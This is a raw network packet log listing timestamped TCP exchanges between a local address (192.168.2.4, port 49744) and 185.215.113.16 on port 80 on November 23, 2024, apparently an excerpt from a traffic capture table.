                                                                                                                                                                                  Nov 23, 2024 14:46:41.998775959 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:41.999669075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.999778986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.000355959 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.000726938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.000845909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.000948906 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.001843929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.001930952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.002891064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.002944946 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.002990007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.003993034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.004084110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.004698038 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.005095005 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.005168915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.005217075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.006124020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.006182909 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.006227016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.007199049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.007332087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.007383108 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.008270025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.008400917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.008441925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.009344101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.009465933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.010180950 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.010426998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.010572910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.010627031 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.011565924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.011679888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.011924028 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.012588978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.012697935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.012747049 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.013654947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.013757944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.013811111 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.014861107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.014976025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.015031099 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.015808105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.015918016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.016879082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.016938925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.016974926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.017955065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.018006086 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.018095016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.019023895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.019076109 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.019143105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.020103931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.020195961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.021193027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.021250963 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.021398067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.022269964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.022322893 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.022365093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.023837090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.023864031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.023888111 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.072686911 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.137480021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.137550116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.137624979 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.138140917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.138329029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.139060020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.139117002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.139276028 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.139317036 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.140140057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.164062023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.164100885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.164171934 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.164450884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.164494991 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.164596081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.165580034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.165666103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.165716887 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.166677952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.166745901 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.166821957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.167716026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.167767048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.167824030 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.168751955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.168800116 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.168875933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.169799089 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.169895887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.169950962 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.170877934 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.170953989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.170989037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.171987057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.172100067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.172164917 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.173149109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.173233986 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.173285007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.174168110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.174216986 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.174248934 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.175221920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.175283909 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.175331116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.176295996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.176358938 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.176407099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.177360058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.177501917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.177542925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.178436041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.178482056 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.178543091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.179517031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.179614067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.179660082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.180582047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.180634975 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.180699110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.181719065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.182172060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.182224989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.182800055 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.182883024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.182934046 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.183804035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.183904886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.183912992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.184914112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.184940100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.184977055 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.185945034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.186034918 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.186048985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.187025070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.187134981 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.187194109 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.188091993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.188201904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.188251019 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.189167023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.189214945 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.189291000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.190253973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.190349102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.190403938 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.191346884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.191442013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.191492081 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.192486048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.192539930 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.192565918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.193491936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.193662882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.193711042 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.194575071 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.194631100 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.194695950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.195692062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.195836067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.195887089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.196724892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.196782112 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.196832895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.197801113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.197849035 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.197912931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.198863029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.198921919 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.198983908 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.199937105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.200063944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.200125933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.201071024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.201122999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.201184034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.202136993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.202189922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.202250004 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.203279972 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.203353882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.203413963 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.204265118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.204313040 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.204358101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.205362082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.205493927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.205549002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.206713915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.206753016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.206763983 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.207470894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.207597017 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.207657099 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.208570957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.208643913 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.208703041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.209629059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.209760904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.209815979 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.210903883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.210954905 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.211069107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.211935997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.212116003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.212160110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.212877989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.212923050 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.213063002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.213953018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.214052916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.214116096 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.215023041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.215087891 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.215259075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.216171026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.216207027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.216265917 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.329505920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.329581022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.329637051 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.330013037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.330133915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.331099033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.331163883 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.331203938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.332097054 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.332146883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.355972052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.356045008 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.356116056 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.356391907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.356431961 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.356604099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.356664896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.357682943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.357743025 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.357788086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.357867956 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.358786106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.358910084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.359287024 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.359870911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.359924078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.360970020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.361027002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.361088991 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.361139059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.361970901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.362082958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.363065958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.363111019 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.363159895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.363198996 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.364145994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.364309072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.364365101 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.365202904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.365349054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.366293907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.366350889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.366415024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.366458893 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.367386103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.367505074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.367563009 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.368755102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.368963003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.369554043 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.369609118 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.369630098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.369673967 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.370615959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.370718956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.371376038 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.371651888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.371794939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.372818947 CET8049744185.215.113.16192.168.2.4
